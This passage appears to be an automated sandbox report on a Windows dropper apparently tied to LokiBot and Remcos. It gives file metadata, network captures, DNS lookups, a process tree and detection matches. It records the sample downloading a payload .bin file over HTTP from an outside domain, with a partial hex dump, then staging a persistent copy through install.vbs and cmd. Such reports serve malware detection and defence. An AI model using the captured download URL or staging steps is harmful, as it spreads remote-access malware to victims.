      .data0x150000x25600x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc0x180000x30a40x4000False0.107666015625data3.2477817313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_ICON0x193fc0x1ca8data
      RT_ICON0x187540xca8data
      RT_ICON0x183ec0x368GLS_BINARY_LSB_FIRST
      RT_GROUP_ICON0x183bc0x30data
      RT_VERSION0x181500x26cdataHungarianHungary

      Imports

      DLLImport
      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

      Version Infos

      DescriptionData
      Translation0x040e 0x04b0
      InternalNameCOLLUMELLIACEOUSFR
      FileVersion1.00
      CompanyNameColdStone
      CommentsColdStone
      ProductNameColdStone
      ProductVersion1.00
      OriginalFilenameCOLLUMELLIACEOUSFR.exe

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      HungarianHungary

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Feb 23, 2021 11:54:17.463218927 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:17.704843044 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.705131054 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:17.706018925 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:17.948926926 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.948966026 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.948980093 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.948992968 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.949004889 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.949018002 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.949033976 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.949049950 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.949065924 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.949081898 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.949105978 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:17.949229956 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:17.949330091 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.194422007 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.194454908 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.194499016 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.194519043 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.194614887 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.194669962 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195597887 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195626020 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195647001 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195671082 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195676088 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195691109 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195696115 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195718050 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195734024 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195741892 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195765018 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195780993 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195787907 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195812941 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195818901 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195837021 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195848942 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195863962 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195890903 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195894957 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195913076 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195930958 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.195936918 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195960999 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.195982933 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.196022987 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.435492992 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.435529947 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.435549974 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.435776949 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.435780048 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.435807943 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.435832024 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.435844898 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.435853004 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.435878992 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.435885906 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.435931921 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437078953 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437158108 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437167883 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437184095 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437207937 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437208891 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437232018 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437235117 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437257051 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437257051 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437283039 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437305927 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437361002 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437396049 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437414885 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437422037 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437447071 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437448025 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437469006 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437474012 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437491894 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437495947 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437513113 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437522888 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437536001 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437570095 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437604904 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437608004 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437629938 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437660933 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437664032 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437690020 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437694073 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437719107 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437743902 CET4975480192.168.2.6103.150.60.242
      Feb 23, 2021 11:54:18.437886000 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437908888 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437931061 CET8049754103.150.60.242192.168.2.6
      Feb 23, 2021 11:54:18.437942028 CET4975480192.168.2.6103.150.60.242

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Feb 23, 2021 11:50:20.494863033 CET6426753192.168.2.68.8.8.8
      Feb 23, 2021 11:50:20.553150892 CET53642678.8.8.8192.168.2.6
      Feb 23, 2021 11:50:20.665954113 CET4944853192.168.2.68.8.8.8
      Feb 23, 2021 11:50:20.717654943 CET53494488.8.8.8192.168.2.6
      Feb 23, 2021 11:50:22.611630917 CET6034253192.168.2.68.8.8.8
      Feb 23, 2021 11:50:22.664818048 CET53603428.8.8.8192.168.2.6
      Feb 23, 2021 11:50:23.752387047 CET6134653192.168.2.68.8.8.8
      Feb 23, 2021 11:50:23.801295042 CET53613468.8.8.8192.168.2.6
      Feb 23, 2021 11:50:25.206598997 CET5177453192.168.2.68.8.8.8
      Feb 23, 2021 11:50:25.255214930 CET53517748.8.8.8192.168.2.6
      Feb 23, 2021 11:50:26.356784105 CET5602353192.168.2.68.8.8.8
      Feb 23, 2021 11:50:26.405522108 CET53560238.8.8.8192.168.2.6
      Feb 23, 2021 11:50:47.749281883 CET5838453192.168.2.68.8.8.8
      Feb 23, 2021 11:50:47.802433014 CET53583848.8.8.8192.168.2.6
      Feb 23, 2021 11:50:49.065958977 CET6026153192.168.2.68.8.8.8
      Feb 23, 2021 11:50:49.117599010 CET53602618.8.8.8192.168.2.6
      Feb 23, 2021 11:50:50.449726105 CET5606153192.168.2.68.8.8.8
      Feb 23, 2021 11:50:50.498434067 CET53560618.8.8.8192.168.2.6
      Feb 23, 2021 11:50:51.436479092 CET5833653192.168.2.68.8.8.8
      Feb 23, 2021 11:50:51.498264074 CET53583368.8.8.8192.168.2.6
      Feb 23, 2021 11:50:55.571991920 CET5378153192.168.2.68.8.8.8
      Feb 23, 2021 11:50:55.621051073 CET53537818.8.8.8192.168.2.6
      Feb 23, 2021 11:50:58.362514973 CET5406453192.168.2.68.8.8.8
      Feb 23, 2021 11:50:58.411736012 CET53540648.8.8.8192.168.2.6
      Feb 23, 2021 11:50:59.567500114 CET5281153192.168.2.68.8.8.8
      Feb 23, 2021 11:50:59.616815090 CET53528118.8.8.8192.168.2.6
      Feb 23, 2021 11:51:00.687546968 CET5529953192.168.2.68.8.8.8
      Feb 23, 2021 11:51:00.740309000 CET53552998.8.8.8192.168.2.6
      Feb 23, 2021 11:51:04.048954010 CET6374553192.168.2.68.8.8.8
      Feb 23, 2021 11:51:04.099860907 CET53637458.8.8.8192.168.2.6
      Feb 23, 2021 11:51:05.391443968 CET5005553192.168.2.68.8.8.8
      Feb 23, 2021 11:51:05.443031073 CET53500558.8.8.8192.168.2.6
      Feb 23, 2021 11:51:09.158325911 CET6137453192.168.2.68.8.8.8
      Feb 23, 2021 11:51:09.219770908 CET53613748.8.8.8192.168.2.6
      Feb 23, 2021 11:51:10.251880884 CET5033953192.168.2.68.8.8.8
      Feb 23, 2021 11:51:10.303505898 CET53503398.8.8.8192.168.2.6
      Feb 23, 2021 11:51:11.731232882 CET6330753192.168.2.68.8.8.8
      Feb 23, 2021 11:51:11.780613899 CET53633078.8.8.8192.168.2.6
      Feb 23, 2021 11:51:16.328846931 CET4969453192.168.2.68.8.8.8
      Feb 23, 2021 11:51:16.380301952 CET53496948.8.8.8192.168.2.6
      Feb 23, 2021 11:51:22.589905024 CET5498253192.168.2.68.8.8.8
      Feb 23, 2021 11:51:22.646641016 CET53549828.8.8.8192.168.2.6
      Feb 23, 2021 11:51:23.502558947 CET5001053192.168.2.68.8.8.8
      Feb 23, 2021 11:51:23.561414957 CET53500108.8.8.8192.168.2.6
      Feb 23, 2021 11:51:24.597790003 CET6371853192.168.2.68.8.8.8
      Feb 23, 2021 11:51:24.655122995 CET53637188.8.8.8192.168.2.6
      Feb 23, 2021 11:51:25.062428951 CET6211653192.168.2.68.8.8.8
      Feb 23, 2021 11:51:25.112900972 CET53621168.8.8.8192.168.2.6
      Feb 23, 2021 11:51:25.580322027 CET6381653192.168.2.68.8.8.8
      Feb 23, 2021 11:51:25.637217045 CET53638168.8.8.8192.168.2.6
      Feb 23, 2021 11:51:26.145210981 CET5501453192.168.2.68.8.8.8
      Feb 23, 2021 11:51:26.194143057 CET53550148.8.8.8192.168.2.6
      Feb 23, 2021 11:51:26.768337011 CET6220853192.168.2.68.8.8.8
      Feb 23, 2021 11:51:26.819892883 CET53622088.8.8.8192.168.2.6
      Feb 23, 2021 11:51:26.949472904 CET5757453192.168.2.68.8.8.8
      Feb 23, 2021 11:51:27.009488106 CET53575748.8.8.8192.168.2.6
      Feb 23, 2021 11:51:27.723774910 CET5181853192.168.2.68.8.8.8
      Feb 23, 2021 11:51:27.781016111 CET53518188.8.8.8192.168.2.6
      Feb 23, 2021 11:51:28.796834946 CET5662853192.168.2.68.8.8.8
      Feb 23, 2021 11:51:28.848501921 CET53566288.8.8.8192.168.2.6
      Feb 23, 2021 11:51:29.329248905 CET6077853192.168.2.68.8.8.8
      Feb 23, 2021 11:51:29.386674881 CET53607788.8.8.8192.168.2.6
      Feb 23, 2021 11:51:34.320015907 CET5379953192.168.2.68.8.8.8
      Feb 23, 2021 11:51:34.378639936 CET53537998.8.8.8192.168.2.6
      Feb 23, 2021 11:51:59.111588001 CET5468353192.168.2.68.8.8.8
      Feb 23, 2021 11:51:59.173008919 CET53546838.8.8.8192.168.2.6
      Feb 23, 2021 11:52:02.304603100 CET5932953192.168.2.68.8.8.8
      Feb 23, 2021 11:52:02.353513002 CET53593298.8.8.8192.168.2.6
      Feb 23, 2021 11:52:05.716749907 CET6402153192.168.2.68.8.8.8
      Feb 23, 2021 11:52:05.773998022 CET53640218.8.8.8192.168.2.6
      Feb 23, 2021 11:54:16.919399977 CET5612953192.168.2.68.8.8.8
      Feb 23, 2021 11:54:17.435394049 CET53561298.8.8.8192.168.2.6

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Feb 23, 2021 11:54:16.919399977 CET192.168.2.68.8.8.80x1496Standard query (0)mtspsmjeli.sch.idA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Feb 23, 2021 11:54:17.435394049 CET8.8.8.8192.168.2.60x1496No error (0)mtspsmjeli.sch.id103.150.60.242A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • mtspsmjeli.sch.id

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.649754103.150.60.24280C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
      TimestampkBytes transferredDirectionData
      Feb 23, 2021 11:54:17.706018925 CET5165OUTGET /cl/Jice_remcos%202_tfkxJbdn252.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Host: mtspsmjeli.sch.id
      Cache-Control: no-cache
      Feb 23, 2021 11:54:17.948966026 CET5166INHTTP/1.1 200 OK
      Connection: Keep-Alive
      Content-Type: application/octet-stream
      Last-Modified: Sun, 21 Feb 2021 23:09:31 GMT
      Accept-Ranges: bytes
      Content-Length: 131136
      Date: Tue, 23 Feb 2021 10:54:17 GMT
      Server: LiteSpeed
      Data Raw: 3a ad 04 c3 ea 0e 50 7a 97 61 2c f0 5c fe 44 4c 29 0c ae ca 1f ad ad 18 dc a1 0a 32 e6 20 82 c5 f9 35 68 d2 3b 10 99 54 54 f6 d5 e7 14 82 c8 66 c9 cd de 83 04 6a 38 10 1a 4d 6b f0 5d ed e3 59 4f ed 8c 3c 73 44 5b 6d 0f 3a 7a be 58 fc 74 1e 48 b1 b4 80 28 38 e4 8d af 5a bf b1 08 6f d1 88 82 f4 c3 aa f3 56 76 40 e8 d9 04 c5 f5 aa 54 d1 0e 58 45 fe 0a 36 78 b5 18 ee 22 d0 16 b1 da e0 9b 84 e6 f2 17 3f ef 4f 53 a4 36 2a a2 b3 5c 18 da b2 47 c9 9a 4f f0 dc e2 9d 29 ef 3a 98 b1 0d 24 e3 2d 04 2b 9c a9 b8 ea 93 88 3f 87 97 a7 77 47 c1 bd 90 f3 90 68 3c 73 2f 6f 4a 8e 03 3a d6 32 51 c8 19 ec 00 7d 87 04 e3 6e 8c 08 9b d7 cf 40 b8 8b c1 9f c8 a8 4d ca 0a 06 3a ef a6 df e9 95 df cb 76 9e 8c 8a 82 38 f2 ab 21 7b 14 67 65 bd de d1 bb f9 ac cc 37 41 84 96 0f 1b 1d 87 ac 85 df df 25 d6 2b cd 28 34 c8 c2 46 14 26 f0 c3 46 05 f3 1a 66 97 b8 12 c4 d7 17 f0 7b 45 97 89 d5 c5 05 b6 0d 06 eb 8b c4 b7 29 d2 7e af b0 af c2 84 dd 42 44 9b cf f2 4a f7 05 d3 e7 19 86 00 e9 3b 52 3f 4c ec 06 82 53 15 c0 c4 6a b2 1a 0e b0 31 04 e2 af c1 45 6b dd d0 4f b9 b8 50 d7 44 1b 14 40 2c 2b b0 37 c9 ac c8 19 b5 ac fa 94 f9 4b a4 16 40 15 40 90 e0 26 9f 02 33 5f 49 39 03 95 01 d7 fe 0e 38 ec cf b3 16 f2 33 ad d5 3d ba 47 31 de 3b 7c bf 3a ce e8 b7 46 9b d7 85 36 ca fa aa ea 9d f9 5a f6 85 90 b8 84 ac f3 af 0b 35 d7 de 06 6d 23 2c 8e 96 2b 1c 58 b5 75 20 2c a1 4b f8 95 31 19 15 f3 ab 3b 78 24 7e 43 a0 96 27 8d 66 68 6f d5 64 b1 b9 99 db 81 5c 97 c5 13 86 6a 53 e1 53 af aa eb 45 a1 5c dd 1a ba 02 86 cb 16 b6 eb 47 ae 4d a4 e1 2f fa 35 0c 23 dd de 05 32 58 77 3a 47 b4 1a a1 bd bb 83 eb c0 f3 f0 ad b4 71 7d 1e 90 5f a8 82 c6 74 33 5e b1 68 d8 35 d7 09 8a 42 45 86 38 59 d5 fb 8b 8e 7a fc a7 b9 d8 b0 ca 48 06 6e 13 a1 4a 7a 7b 46 41 a2 fa 7d 85 9a 41 b6 98 66 90 0d 5a b8 d2 37 ba 9a 3d 92 8a 6f ee d9 d4 8e 52 12 e1 bc 37 2c 27 74 1f 03 5e 3e 9c 8e e9 ae 49 0c b6 be 17 7d 2d 43 6a de bd 54 9f ec 52 25 5e 63 76 a5 fc f9 1a 55 cf 84 44 a1 cc 61 7b 61 88 e5 7a 78 9c 2d 0a 0a bc 29 e6 f1 63 12 d8 03 60 68 25 ea da 06 ac bc 18 d5 c6 85 66 f9 0e ff e8 2b 4d 57 56 68 9b 43 a8 46 44 d3 50 e8 13 c6 c2 21 88 d8 c7 fe 0b 6a be ed 6e 4f 67 5a 61 27 91 f7 41 39 88 6d 63 b3 9c a0 4f 9b bf f5 19 45 d0 98 a2 9f fc 8e 62 8e 11 7d 7d e0 dc ba 63 a2 5e e8 d5 f7 be e8 8e e4 1d 73 d4 fc a1 27 f8 b1 2b 93 56 86 9c b0 28 fb 96 4c f9 6d 02 74 e1 04 2c 9a 3c 06 e2 49 2f 99 51 4c 31 40 e5 a8 7e cb cb 88 c2 a3 5d bb c9 1b 93 f4 7d a9 2f 70 22 5e 3a 50 b2 ad fb 07 63 2d 9c ac fe 58 85 2c 4a 12 4b 98 4c 77 00 44 45 7f 67 95 7e 77 86 98 20 20 3a 35 6b 54 12 5e bd fd c3 e1 08 3f 0b 35 a4 55 fd bd a4 c1 a7 58 7c 4f 6d d6 1b 67 87 49 e1 7f da 98 ce ab 97 a0 4b 91 91 30 34 30 f3 92 50 6c d6 36 8f 67 d9 74 46 a7 f5 04 c6 49 73 f0 e2 27 ef d4 31 c5 16 c8 a7 98 d5 17 b8 b4 ed bd 14 e8 35 8d 38 69 22 16 60 3b 10 3c c8 da 68 a2 91 7c 9a c4 86 c1 c5 02 b7 1c 3c 70 44 5b 6d 0b 3a 7a be a7 03 74 1e f0 b1 b4 80 28 38 e4 8d ef 5a bf b1 08 6f d1 88 82 f4 c3 aa f3 56 76 40 e8 d9 04 c5 f5 aa 54 d1 0e 58 45 fe 0a 36 78 b5 18 ee 22 d0 ee b1 da e0 95 9b 5c fc 17 8b e6 82 72 1c 37 66 6f 92 08 70 b3 c1 67 b9 e8 20 97 ae 83 f0 09 8c 5b f6 df 62 50 c3 4f 61 0b ee dc d6 ca fa e6 1f c3 d8 f4 57 2a ae d9 f5 dd 9d 65 36 57 2f 6f 4a 8e 03 3a d6 56 2d 4f a0 cc 1d 94 6d 24 fe 87 66 28 86 3e 25 2d 86 7f 2b be d5 41 a7 b9 34 f6 d0 cd bb 36 03 b5 c2 22 9c b1 91 63 68
      Data Ascii: :Pza,\DL)2 5h;TTfj8Mk]YO<sD[m:zXtH(8ZoVv@TXE6x"?OS6*\GO):$-+?wGh<s/oJ:2Q}n@M:v8!{ge7A%+(4F&Ff{E)~BDJ;R?LSj1EkOPD@,+7K@@&3_I983=G1;|:F6Z5m#,+Xu ,K1;x$~C'fhod\jSSE\GM/5#2Xw:Gq}_t3^h5BE8YzHnJz{FA}AfZ7=oR7,'t^>I}-CjTR%^cvUDa{azx-)c`h%f+MWVhCFDP!jnOgZa'A9mcOEb}}c^s'+V(Lmt,<I/QL1@~]}/p"^:Pc-X,JKLwDEg~w :5kT^?5UX|OmgIK040Pl6gtFIs'158i"`;<h|<pD[m:zt(8ZoVv@TXE6x"\r7fopg [bPOaW*e6W/oJ:V-Om$f(>%-+A46"ch


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:11:50:27
      Start date:23/02/2021
      Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe'
      Imagebase:0x400000
      File size:106496 bytes
      MD5 hash:869EAE0220A293DCABF4051DD323BBD8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Reputation:low

      General

      Start time:11:54:09
      Start date:23/02/2021
      Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe'
      Imagebase:0x400000
      File size:106496 bytes
      MD5 hash:869EAE0220A293DCABF4051DD323BBD8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000013.00000003.820991756.000000000094C000.00000004.00000001.sdmp, Author: Florian Roth
      Reputation:low

      General

      Start time:11:54:19
      Start date:23/02/2021
      Path:C:\Windows\SysWOW64\wscript.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
      Imagebase:0x840000
      File size:147456 bytes
      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:11:54:22
      Start date:23/02/2021
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
      Imagebase:0x2a0000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:11:54:22
      Start date:23/02/2021
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff61de10000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:11:54:22
      Start date:23/02/2021
      Path:C:\Users\user\AppData\Roaming\win.exe
      Wow64 process (32bit):true
      Commandline:C:\Users\user\AppData\Roaming\win.exe
      Imagebase:0x400000
      File size:106496 bytes
      MD5 hash:869EAE0220A293DCABF4051DD323BBD8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Antivirus matches:
      • Detection: 100%, Joe Sandbox ML
      • Detection: 35%, Virustotal, Browse
      • Detection: 40%, ReversingLabs
      Reputation:low

      General

      Start time:11:54:28
      Start date:23/02/2021
      Path:C:\Users\user\AppData\Roaming\win.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\AppData\Roaming\win.exe'
      Imagebase:0x400000
      File size:106496 bytes
      MD5 hash:869EAE0220A293DCABF4051DD323BBD8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >